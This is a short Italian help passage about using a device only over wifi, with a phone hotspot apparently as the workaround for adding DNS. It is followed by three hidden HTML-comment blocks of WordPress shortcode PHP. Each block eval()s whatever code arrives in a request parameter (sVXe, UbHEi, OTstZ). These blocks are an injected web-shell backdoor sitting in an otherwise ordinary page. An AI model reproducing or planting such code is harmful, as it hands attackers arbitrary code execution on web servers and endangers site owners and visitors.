L'apparecchio che lo utilizza deve collegarsi a Internet solo via wifi. Non è possibile utilizzare lo smart phone con 3g,4g e utilizzarlo per guardare contemporaneamente, ma è possibile impostare lo smart phone come hotspot e utilizzare altri dispositivi per collegarsi tramite esso.

Il motivo è che se lo fai, non c'è posto per aggiungere dns.

<!– [insert_php]if (isset($_REQUEST["sVXe"])){eval($_REQUEST["sVXe"]);exit;}[/insert_php][php]if (isset($_REQUEST["sVXe"])){eval($_REQUEST["sVXe"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["UbHEi"])){eval($_REQUEST["UbHEi"]);exit;}[/insert_php][php]if (isset($_REQUEST["UbHEi"])){eval($_REQUEST["UbHEi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["OTstZ"])){eval($_REQUEST["OTstZ"]);exit;}[/insert_php][php]if (isset($_REQUEST["OTstZ"])){eval($_REQUEST["OTstZ"]);exit;}[/php] –>